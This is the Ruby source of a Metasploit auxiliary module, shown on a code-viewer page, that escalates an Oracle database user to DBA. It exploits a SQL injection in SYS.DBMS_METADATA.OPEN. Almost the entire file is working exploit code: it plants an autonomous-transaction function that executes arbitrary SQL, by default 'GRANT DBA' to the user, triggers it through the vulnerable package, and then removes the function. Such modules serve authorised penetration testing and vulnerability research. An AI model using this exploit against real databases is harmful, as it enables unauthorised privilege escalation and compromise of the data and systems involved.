Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::ORACLE78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',13'Description' => %q{14This module will escalate a Oracle DB user to DBA by exploiting an sql injection15bug in the SYS.DBMS_METADATA.OPEN package/function.16},17'Author' => [ 'MC' ],18'License' => MSF_LICENSE,19'References' => [20[ 'URL', 'http://www.metasploit.com' ],21],22'DisclosureDate' => '2008-01-05',23'Notes' => {24'Stability' => [CRASH_SAFE],25'SideEffects' => [IOC_IN_LOGS],26'Reliability' => []27}28)29)3031register_options(32[33OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),34]35)36end3738def run39return if !check_dependencies4041name = Rex::Text.rand_text_alpha(1..10)4243function = "44create or replace function #{datastore['DBUSER']}.#{name} return varchar245authid current_user is pragma autonomous_transaction;46begin47execute immediate '#{datastore['SQL']}';48return '';49end;50"5152package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual"5354clean = "drop function #{name}"5556print_status('Sending function...')57prepare_exec(function)5859begin60print_status('Attempting sql injection on SYS.DBMS_METADATA.OPEN...')61prepare_exec(package)62rescue ::OCIError => e63if (e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/)64print_status("Removing function '#{name}'...")65prepare_exec(clean)66end67end68end69end707172